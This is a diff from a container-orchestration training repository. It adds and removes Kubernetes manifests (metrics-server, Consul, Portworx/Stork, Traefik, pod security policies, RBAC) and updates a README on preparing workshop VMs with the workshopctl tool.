spec:
serviceAccountName: metrics-server
volumes:
# mount in tmp so we can safely use from-scratch images and/or read-only containers
- name: tmp-dir
emptyDir: {}
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.1
imagePullPolicy: Always
volumeMounts:
- name: tmp-dir
mountPath: /tmp
args:
- --kubelet-preferred-address-types=InternalIP
- --kubelet-insecure-tls
- --metric-resolution=5s
---
apiVersion: v1
kind: Service
metadata:
name: metrics-server
namespace: kube-system
labels:
kubernetes.io/name: "Metrics-server"
spec:
selector:
k8s-app: metrics-server
ports:
- port: 443
protocol: TCP
targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system

View File

@@ -5,7 +5,7 @@ metadata:
spec:
podSelector:
matchLabels:
app: testweb
run: testweb
ingress:
- from:
- podSelector:

View File

@@ -5,6 +5,6 @@ metadata:
spec:
podSelector:
matchLabels:
app: testweb
run: testweb
ingress: []

View File

@@ -1,22 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector:
matchLabels:
ingress:
- from:
- podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-webui
spec:
podSelector:
matchLabels:
app: webui
ingress:
- from: []

View File

@@ -1,21 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-volume
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
- name: git
image: alpine
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/
restartPolicy: OnFailure

View File

@@ -1,95 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [ "" ]
resources: [ pods ]
verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
volumeMounts:
- name: data
mountPath: /consul/data
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,580 +0,0 @@
# SOURCE: https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true
apiVersion: v1
kind: ConfigMap
metadata:
name: stork-config
namespace: kube-system
data:
policy.cfg: |-
{
"kind": "Policy",
"apiVersion": "v1",
"extenders": [
{
"urlPrefix": "http://stork-service.kube-system.svc:8099",
"apiVersion": "v1beta1",
"filterVerb": "filter",
"prioritizeVerb": "prioritize",
"weight": 5,
"enableHttps": false,
"nodeCacheCapable": false
}
]
}
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: stork-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list", "delete"]
- apiGroups: [""]
resources: ["persistentvolumes"]
verbs: ["get", "list", "watch", "create", "delete"]
- apiGroups: [""]
resources: ["persistentvolumeclaims"]
verbs: ["get", "list", "watch", "update"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["events"]
verbs: ["list", "watch", "create", "update", "patch"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "list", "watch", "delete"]
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
resources: ["volumesnapshots"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
resources: ["volumesnapshotdatas"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "create", "update"]
- apiGroups: [""]
resources: ["services"]
verbs: ["get"]
- apiGroups: [""]
resources: ["nodes"]
verbs: ["get", "list", "watch"]
- apiGroups: ["*"]
resources: ["deployments", "deployments/extensions"]
verbs: ["list", "get", "watch", "patch", "update", "initialize"]
- apiGroups: ["*"]
resources: ["statefulsets", "statefulsets/extensions"]
verbs: ["list", "get", "watch", "patch", "update", "initialize"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-role-binding
subjects:
- kind: ServiceAccount
name: stork-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: stork-role
apiGroup: rbac.authorization.k8s.io
---
kind: Service
apiVersion: v1
metadata:
name: stork-service
namespace: kube-system
spec:
selector:
name: stork
ports:
- protocol: TCP
port: 8099
targetPort: 8099
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ""
labels:
tier: control-plane
name: stork
namespace: kube-system
spec:
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
replicas: 3
template:
metadata:
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ""
labels:
name: stork
tier: control-plane
spec:
containers:
- command:
- /stork
- --driver=pxd
- --verbose
- --leader-elect=true
- --health-monitor-interval=120
imagePullPolicy: Always
image: openstorage/stork:1.1.3
resources:
requests:
cpu: '0.1'
name: stork
hostPID: false
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: "name"
operator: In
values:
- stork
topologyKey: "kubernetes.io/hostname"
serviceAccountName: stork-account
---
kind: StorageClass
apiVersion: storage.k8s.io/v1
metadata:
name: stork-snapshot-sc
provisioner: stork-snapshot
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: stork-scheduler-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-scheduler-role
rules:
- apiGroups: [""]
resources: ["endpoints"]
verbs: ["get", "update"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch", "update"]
- apiGroups: [""]
resources: ["endpoints"]
verbs: ["create"]
- apiGroups: [""]
resourceNames: ["kube-scheduler"]
resources: ["endpoints"]
verbs: ["delete", "get", "patch", "update"]
- apiGroups: [""]
resources: ["nodes"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["delete", "get", "list", "watch"]
- apiGroups: [""]
resources: ["bindings", "pods/binding"]
verbs: ["create"]
- apiGroups: [""]
resources: ["pods/status"]
verbs: ["patch", "update"]
- apiGroups: [""]
resources: ["replicationcontrollers", "services"]
verbs: ["get", "list", "watch"]
- apiGroups: ["app", "extensions"]
resources: ["replicasets"]
verbs: ["get", "list", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets"]
verbs: ["get", "list", "watch"]
- apiGroups: ["policy"]
resources: ["poddisruptionbudgets"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["persistentvolumeclaims", "persistentvolumes"]
verbs: ["get", "list", "watch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-scheduler-role-binding
subjects:
- kind: ServiceAccount
name: stork-scheduler-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: stork-scheduler-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: apps/v1beta1
kind: Deployment
metadata:
labels:
component: scheduler
tier: control-plane
name: stork-scheduler
name: stork-scheduler
namespace: kube-system
spec:
replicas: 3
template:
metadata:
labels:
component: scheduler
tier: control-plane
name: stork-scheduler
spec:
containers:
- command:
- /usr/local/bin/kube-scheduler
- --address=0.0.0.0
- --leader-elect=true
- --scheduler-name=stork
- --policy-configmap=stork-config
- --policy-configmap-namespace=kube-system
- --lock-object-name=stork-scheduler
image: gcr.io/google_containers/kube-scheduler-amd64:v1.11.2
livenessProbe:
httpGet:
path: /healthz
port: 10251
initialDelaySeconds: 15
name: stork-scheduler
readinessProbe:
httpGet:
path: /healthz
port: 10251
resources:
requests:
cpu: '0.1'
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: "name"
operator: In
values:
- stork-scheduler
topologyKey: "kubernetes.io/hostname"
hostPID: false
serviceAccountName: stork-scheduler-account
---
kind: Service
apiVersion: v1
metadata:
name: portworx-service
namespace: kube-system
labels:
name: portworx
spec:
selector:
name: portworx
ports:
- name: px-api
protocol: TCP
port: 9001
targetPort: 9001
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: px-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: node-get-put-list-role
rules:
- apiGroups: [""]
resources: ["nodes"]
verbs: ["watch", "get", "update", "list"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["delete", "get", "list"]
- apiGroups: [""]
resources: ["persistentvolumeclaims", "persistentvolumes"]
verbs: ["get", "list"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "list", "update", "create"]
- apiGroups: ["extensions"]
resources: ["podsecuritypolicies"]
resourceNames: ["privileged"]
verbs: ["use"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: node-role-binding
subjects:
- kind: ServiceAccount
name: px-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: node-get-put-list-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Namespace
metadata:
name: portworx
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-role
namespace: portworx
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list", "create", "update", "patch"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-role-binding
namespace: portworx
subjects:
- kind: ServiceAccount
name: px-account
namespace: kube-system
roleRef:
kind: Role
name: px-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: portworx
namespace: kube-system
annotations:
portworx.com/install-source: "https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true"
spec:
minReadySeconds: 0
updateStrategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 1
template:
metadata:
labels:
name: portworx
spec:
affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: px/enabled
operator: NotIn
values:
- "false"
- key: node-role.kubernetes.io/master
operator: DoesNotExist
hostNetwork: true
hostPID: false
containers:
- name: portworx
image: portworx/oci-monitor:1.4.2.2
imagePullPolicy: Always
args:
["-c", "px-workshop", "-s", "/dev/loop4", "-b",
"-x", "kubernetes"]
env:
- name: "PX_TEMPLATE_VERSION"
value: "v4"
livenessProbe:
periodSeconds: 30
initialDelaySeconds: 840 # allow image pull in slow networks
httpGet:
host: 127.0.0.1
path: /status
port: 9001
readinessProbe:
periodSeconds: 10
httpGet:
host: 127.0.0.1
path: /health
port: 9015
terminationMessagePath: "/tmp/px-termination-log"
securityContext:
privileged: true
volumeMounts:
- name: dockersock
mountPath: /var/run/docker.sock
- name: etcpwx
mountPath: /etc/pwx
- name: optpwx
mountPath: /opt/pwx
- name: proc1nsmount
mountPath: /host_proc/1/ns
- name: sysdmount
mountPath: /etc/systemd/system
- name: diagsdump
mountPath: /var/cores
- name: journalmount1
mountPath: /var/run/log
readOnly: true
- name: journalmount2
mountPath: /var/log
readOnly: true
- name: dbusmount
mountPath: /var/run/dbus
restartPolicy: Always
serviceAccountName: px-account
volumes:
- name: dockersock
hostPath:
path: /var/run/docker.sock
- name: etcpwx
hostPath:
path: /etc/pwx
- name: optpwx
hostPath:
path: /opt/pwx
- name: proc1nsmount
hostPath:
path: /proc/1/ns
- name: sysdmount
hostPath:
path: /etc/systemd/system
- name: diagsdump
hostPath:
path: /var/cores
- name: journalmount1
hostPath:
path: /var/run/log
- name: journalmount2
hostPath:
path: /var/log
- name: dbusmount
hostPath:
path: /var/run/dbus
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: px-lh-account
namespace: kube-system
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-lh-role
namespace: kube-system
rules:
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "create", "update"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-lh-role-binding
namespace: kube-system
subjects:
- kind: ServiceAccount
name: px-lh-account
namespace: kube-system
roleRef:
kind: Role
name: px-lh-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Service
metadata:
name: px-lighthouse
namespace: kube-system
labels:
tier: px-web-console
spec:
type: NodePort
ports:
- name: http
port: 80
nodePort: 32678
- name: https
port: 443
nodePort: 32679
selector:
tier: px-web-console
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
name: px-lighthouse
namespace: kube-system
labels:
tier: px-web-console
spec:
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
selector:
matchLabels:
tier: px-web-console
replicas: 1
template:
metadata:
labels:
tier: px-web-console
spec:
initContainers:
- name: config-init
image: portworx/lh-config-sync:0.2
imagePullPolicy: Always
args:
- "init"
volumeMounts:
- name: config
mountPath: /config/lh
containers:
- name: px-lighthouse
image: portworx/px-lighthouse:1.5.0
imagePullPolicy: Always
ports:
- containerPort: 80
- containerPort: 443
volumeMounts:
- name: config
mountPath: /config/lh
- name: config-sync
image: portworx/lh-config-sync:0.2
imagePullPolicy: Always
args:
- "sync"
volumeMounts:
- name: config
mountPath: /config/lh
serviceAccountName: px-lh-account
volumes:
- name: config
emptyDir: {}

View File

@@ -1,30 +0,0 @@
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: postgres
spec:
selector:
matchLabels:
app: postgres
serviceName: postgres
template:
metadata:
labels:
app: postgres
spec:
schedulerName: stork
containers:
- name: postgres
image: postgres:10.5
volumeMounts:
- mountPath: /var/lib/postgresql/data
name: postgres
volumeClaimTemplates:
- metadata:
name: postgres
spec:
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: 1Gi

View File

@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: privileged
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
privileged: true
allowPrivilegeEscalation: true
allowedCapabilities:
- '*'
volumes:
- '*'
hostNetwork: true
hostPorts:
- min: 0
max: 65535
hostIPC: true
hostPID: true
runAsUser:
rule: 'RunAsAny'
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'RunAsAny'
fsGroup:
rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:privileged
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['privileged']

View File

@@ -1,38 +0,0 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
annotations:
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
name: restricted
spec:
allowPrivilegeEscalation: false
fsGroup:
rule: RunAsAny
runAsUser:
rule: RunAsAny
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
volumes:
- configMap
- emptyDir
- projected
- secret
- downwardAPI
- persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:restricted
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['restricted']

View File

@@ -1,15 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: registry
spec:
containers:
- name: registry
image: registry
env:
- name: REGISTRY_HTTP_ADDR
valueFrom:
configMapKeyRef:
name: registry
key: http.addr

View File

@@ -6,7 +6,7 @@ metadata:
creationTimestamp: null
generation: 1
labels:
app: socat
run: socat
name: socat
namespace: kube-system
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
@@ -14,7 +14,7 @@ spec:
replicas: 1
selector:
matchLabels:
app: socat
run: socat
strategy:
rollingUpdate:
maxSurge: 1
@@ -24,7 +24,7 @@ spec:
metadata:
creationTimestamp: null
labels:
app: socat
run: socat
spec:
containers:
- args:
@@ -49,7 +49,7 @@ kind: Service
metadata:
creationTimestamp: null
labels:
app: socat
run: socat
name: socat
namespace: kube-system
selfLink: /api/v1/namespaces/kube-system/services/socat
@@ -60,7 +60,7 @@ spec:
protocol: TCP
targetPort: 80
selector:
app: socat
run: socat
sessionAffinity: None
type: NodePort
status:

View File

@@ -1,11 +0,0 @@
kind: StorageClass
apiVersion: storage.k8s.io/v1beta1
metadata:
name: portworx-replicated
annotations:
storageclass.kubernetes.io/is-default-class: "true"
provisioner: kubernetes.io/portworx-volume
parameters:
repl: "2"
priority_io: "high"

View File

@@ -1,100 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: extensions/v1beta1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --api
- --kubernetes
- --logLevel=INFO
---
kind: Service
apiVersion: v1
metadata:
name: traefik-ingress-service
namespace: kube-system
spec:
selector:
k8s-app: traefik-ingress-lb
ports:
- protocol: TCP
port: 80
name: web
- protocol: TCP
port: 8080
name: admin
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system

View File

@@ -1,33 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: jean.doe
namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
resources: [ certificatesigningrequests ]
verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
resourceNames: [ users:jean.doe ]
resources: [ certificatesigningrequests ]
verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: users:jean.doe
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: users:jean.doe
subjects:
- kind: ServiceAccount
name: jean.doe
namespace: users

View File

@@ -1,70 +0,0 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node2
annotations:
node: node2
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node3
annotations:
node: node3
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node4
annotations:
node: node4
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node4

View File

@@ -32,7 +32,7 @@ Virtualbox, Vagrant and Ansible
$ source path/to/your-ansible-clone/hacking/env-setup
- you need to repeat the last step every time you open a new terminal session
- you need to repeat the last step everytime you open a new terminal session
and want to use any Ansible command (but you'll probably only need to run
it once).

View File

@@ -1,10 +1,4 @@
# Trainer tools to create and prepare VMs for Docker workshops
These tools can help you to create VMs on:
- Azure
- EC2
- OpenStack
# Trainer tools to create and prepare VMs for Docker workshops on AWS or Azure
## Prerequisites
@@ -12,9 +6,6 @@ These tools can help you to create VMs on:
- [Docker Compose](https://docs.docker.com/compose/install/)
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`) - the configuration scripts require this
Depending on the infrastructure that you want to use, you also need to install
the Azure CLI, the AWS CLI, or terraform (for OpenStack deployment).
And if you want to generate printable cards:
- [pyyaml](https://pypi.python.org/pypi/PyYAML) (on a Mac: `brew install pyyaml`)
@@ -23,25 +14,20 @@ And if you want to generate printable cards:
## General Workflow
- fork/clone repo
- create an infrastructure configuration in the `prepare-vms/infra` directory
(using one of the example files in that directory)
- set required environment variables
- create your own setting file from `settings/example.yaml`
- if necessary, increase allowed open files: `ulimit -Sn 10000`
- run `./workshopctl start` to create instances
- run `./workshopctl deploy` to install Docker and setup environment
- run `./workshopctl kube` (if you want to install and setup Kubernetes)
- run `./workshopctl cards` (if you want to generate PDF for printing handouts of each users host IP's and login info)
- run `./workshopctl stop` at the end of the workshop to terminate instances
- run `./workshopctl` commands to create instances, install docker, setup each users environment in node1, other management tasks
- run `./workshopctl cards` command to generate PDF for printing handouts of each users host IP's and login info
## Clone/Fork the Repo, and Build the Tools Image
The Docker Compose file here is used to build a image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).
$ git clone https://github.com/jpetazzo/container.training
$ cd container.training/prepare-vms
$ git clone https://github.com/jpetazzo/orchestration-workshop.git
$ cd orchestration-workshop/prepare-vms
$ docker-compose build
## Preparing to Run `./workshopctl`
### Required AWS Permissions/Info
@@ -50,37 +36,27 @@ The Docker Compose file here is used to build a image with all the dependencies
- Using a non-default VPC or Security Group isn't supported out of box yet, so you will have to customize `lib/commands.sh` if you want to change that.
- These instances will assign the default VPC Security Group, which does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg` which opens up all ports.
### Create your `infra` file
### Required Environment Variables
You need to do this only once. (On AWS, you can create one `infra`
file per region.)
- `AWS_ACCESS_KEY_ID`
- `AWS_SECRET_ACCESS_KEY`
- `AWS_DEFAULT_REGION`
Make a copy of one of the example files in the `infra` directory.
If you're not using AWS, set these to placeholder values:
For instance:
```bash
cp infra/example.aws infra/aws-us-west-2
```
Edit your infrastructure file to customize it.
You will probably need to put your cloud provider credentials,
select region...
export AWS_ACCESS_KEY_ID="foo"
export AWS_SECRET_ACCESS_KEY="foo"
export AWS_DEFAULT_REGION="foo"
```
If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS you can ignore this.
### Create your `settings` file
### Update/copy `settings/example.yaml`
Similarly, pick one of the files in `settings` and copy it
to customize it.
Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `./workshopctl deploy`, `./workshopctl cards`, etc.
For instance:
```bash
cp settings/example.yaml settings/myworkshop.yaml
```
You're all set!
./workshopctl cards 2016-09-28-00-33-bret settings/orchestration.yaml
## `./workshopctl` Usage
@@ -90,7 +66,7 @@ Commands:
ami Show the AMI that will be used for deployment
amis List Ubuntu AMIs in the current region
build Build the Docker image to run this program in a container
cards Generate ready-to-print cards for a group of VMs
cards Generate ready-to-print cards for a batch of VMs
deploy Install Docker on a bunch of running VMs
ec2quotas Check our EC2 quotas (max instances)
help Show available commands
@@ -98,14 +74,14 @@ ids List the instance IDs belonging to a given tag or token
ips List the IP addresses of the VMs for a given tag or token
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
kubetest Check that all notes are reporting as Ready
list List available groups in the current region
list List available batches in the current region
opensg Open the default security group to ALL ingress traffic
pull_images Pre-pull a bunch of Docker images
retag Apply a new tag to a group of VMs
start Start a group of VMs
status List instance status for a given group
retag Apply a new tag to a batch of VMs
start Start a batch of VMs
status List instance status for a given batch
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
test Run tests (pre-flight checks) on a group of VMs
test Run tests (pre-flight checks) on a batch of VMs
wrap Run this program in a container
```
@@ -119,22 +95,22 @@ wrap Run this program in a container
- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
- During `deploy` it will create the `docker` user with password `training`, which is printing on the cards for students. This can be configured with the `docker_user_password` property in the settings file.
### Example Steps to Launch a group of AWS Instances for a Workshop
### Example Steps to Launch a Batch of AWS Instances for a Workshop
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings/myworkshop.yaml --count 60` to create 60 EC2 instances
- Run `./workshopctl start N` Creates `N` EC2 instances
- Your local SSH key will be synced to instances under `ubuntu` user
- AWS instances will be created and tagged based on date, and IP's stored in `prepare-vms/tags/`
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
- Run `./workshopctl deploy TAG settings/somefile.yaml` to run `lib/postprep.py` via parallel-ssh
- If it errors or times out, you should be able to rerun
- Requires good connection to run all the parallel SSH connections, up to 100 parallel (ProTip: create dedicated management instance in same AWS region where you run all these utils from)
- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
- Run `./workshopctl cards TAG` generates PDF/HTML files to print and cut and hand out to students
- Run `./workshopctl cards TAG settings/somefile.yaml` generates PDF/HTML files to print and cut and hand out to students
- *Have a great workshop*
- Run `./workshopctl stop TAG` to terminate instances.
### Example Steps to Launch Azure Instances
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account
- Customize `azuredeploy.parameters.json`
- Required:
- Provide the SSH public key you plan to use for instance configuration
@@ -179,16 +155,27 @@ az group delete --resource-group workshop
### Example Steps to Configure Instances from a non-AWS Source
- Copy `infra/example.generic` to `infra/generic`
- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
- Edit the file `prepare-vms/tags/TAG/ips.txt`, it should list the IP addresses of the VMs (one per line, without any comments or other info)
- Continue deployment of cluster configuration with `./workshopctl deploy TAG`
- Optionally, configure Kubernetes clusters of the size in the settings: workshopctl kube `TAG`
- Optionally, test your Kubernetes clusters. They may take a little time to become ready: workshopctl kubetest `TAG`
- Generate cards to print and hand out: workshopctl cards `TAG`
- Print the cards file: prepare-vms/tags/`TAG`/ips.html
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to ssh into them.
- Set placeholder values for [AWS environment variable settings](#required-environment-variables).
- Choose a tag. It could be an event name, datestamp, etc. Ensure you have created a directory for your tag: `prepare-vms/tags/<tag>/`
- If you have not already generated a file with the IPs to be configured:
- The file should be named `prepare-vms/tags/<tag>/ips.txt`
- Format is one IP per line, no other info needed.
- Ensure the settings file is as desired (especially the number of nodes): `prepare-vms/settings/kube101.yaml`
- For a tag called `myworkshop`, configure instances: `workshopctl deploy myworkshop settings/kube101.yaml`
- Optionally, configure Kubernetes clusters of the size in the settings: `workshopctl kube myworkshop`
- Optionally, test your Kubernetes clusters. They may take a little time to become ready: `workshopctl kubetest myworkshop`
- Generate cards to print and hand out: `workshopctl cards myworkshop settings/kube101.yaml`
